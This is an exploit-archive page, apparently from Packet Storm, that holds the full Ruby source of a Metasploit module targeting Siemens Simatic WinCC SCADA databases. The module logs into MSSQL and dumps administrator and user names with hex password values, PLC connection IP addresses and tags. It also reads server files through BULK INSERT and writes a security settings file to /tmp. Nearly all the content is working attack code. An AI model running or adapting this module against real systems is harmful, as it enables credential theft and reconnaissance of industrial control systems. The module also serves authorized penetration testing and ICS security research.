exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Simatic WinCC Information Harvester

Simatic WinCC Information Harvester
Posted Jan 21, 2013
Authored by Gleb Gritsai, Vyacheslav Egoshin, Dmitry Nagibin | Site metasploit.com

This Metasploit module receives sensitive information from the WinCC database.

tags | exploit
SHA-256 | 627da9137aaf5c71b77b876b03bb54d07c3d0135bcd88283a54933c5111a7071

Simatic WinCC Information Harvester

Change Mirror Download
## encoding: UTF-8
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL

def initialize(info = {})
super(update_info(info,
'Name' => 'Simatic WinCC info harvester',
'Description' => %q{
This module receives sensitive information from the WinCC database.
},
'Author' =>
[
'Dmitry Nagibin', # research
'Gleb Gritsai <ggritsai@ptsecurity.ru>', # research
'Vyacheslav Egoshin <vegoshin@ptsecurity.ru>', # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.ptsecurity.com' ]
],
'Version' => '$Revision$',
'DisclosureDate'=> 'Jun 3 2012'
))
register_options(
[
OptString.new('DOCUMENTS_FOLDER_NAME', [true, "Documents folder name", 'Documents']),
], self.class
)
end

def run
if mssql_login_datastore # connect

project_databases_names = q("SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]'") # get db

get_info project_databases_names

else
print_error "Can't connect to the database"
end
end

def q query, show_errors = true, verbose = false, only_rows = true
result = mssql_query(query, verbose)
if !result[:errors].empty? and show_errors
print_error "Error: #{result[:errors]}"
print_error "Error query: #{query}"
else
only_rows ? result[:rows] : result
end
end

def get_info dbs
prj ={}
dbs.map do |db|

db = db.first # get db name

prj[db] = {} # init hash
prj[db]["name"] = q("SELECT DSN FROM #{db}.dbo.CC_CsSysInfoLog")
prj[db]["admins"] = q("SELECT NAME, convert(varbinary, PASS) as PWD from #{db}.dbo.PW_USER WHERE PASS <> '' and GRPID = 1000")
prj[db]["users"] = q("SELECT ID, NAME, convert(varbinary, PASS), GRPID FROM #{db}.[dbo].[PW_USER] WHERE PASS <> '' and GRPID <> 1000")
prj[db]["groups"] = q("SELECT ID, NAME FROM #{db}.[dbo].[PW_USER] WHERE PASS = ''")
prj[db]["plcs"] = q("SELECT CONNECTIONNAME, PARAMETER FROM #{db}.[dbo].[MCPTCONNECTION]")
prj[db]["tags"] = q("SELECT VARNAME,VARTYP,COMMENTS FROM #{db}.[dbo].[PDE#TAGs]")

prj[db]["plcs"] = prj[db]["plcs"].map do |name, ip| # get plc IP
real_ip = ip # set current value
real_ip = ip.scan(/\d+\.\d+\.\d+\.\d+/).first if ip =~ /\d+\.\d+\.\d+\.\d+/ # if ip notation found
[name, real_ip]
end

print_good "Project: #{prj[db]["name"].first.first}\n" # print project name

#Table data
print_table %w|ID NAME| , prj[db]["groups"], "WinCC groups"
print_table %w|Name Password(hex)| , prj[db]["admins"], "WinCC administrator"
print_table %w|ID NAME Password(hex) GRPID| , prj[db]["users"], "WinCC users"
print_table %w|VARNAME VARTYP COMMENTS| , prj[db]["tags"], "WinCC tags"
print_table %w|CONNECTIONNAME PARAMETER| , prj[db]["plcs"], "WinCC PLCs"

#check file access through batched queries
if can_read_file? db
settings = read_file get_value("Security settings path"), db

if settings # save results to file
File.open("/tmp/security_settings.xml", "w+") do |f|
f.puts settings
end
end

end
print_line
end
end

def print_table columns, rows, header = ''
tbl = Rex::Ui::Text::Table.new(
'Indent' => 4,
'Header' => header,
'Columns' => columns
)
unless rows.nil?
rows.each do |r|
tbl << r # add rows
end

print_line tbl.to_s
end
end

#read file through batched queries
def read_file file_name, db
q("CREATE TABLE mydata (line varchar(8000));", false)
q("BULK INSERT mydata FROM '#{file_name}';", false)
result = q("select * from mydata", false)
q("DROP TABLE mydata;", false)
print_error("Can't read file: #{file_name}") if result.nil?
result
end

#check account read file
def can_read_file? db
res = read_file get_value("test"), db
print_status "Access read files! (#{get_value "test"} read)" unless res.nil?
res.size > 0 # return true or false
end

def get_value i
config = {
"Security settings path" => %q|C:\Documents and Settings\All Users\Documents\SimaticSecurityControl\setRules.xml|,
"test" => %q|C:\Windows\win.ini|
}
config[i]
end

end

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close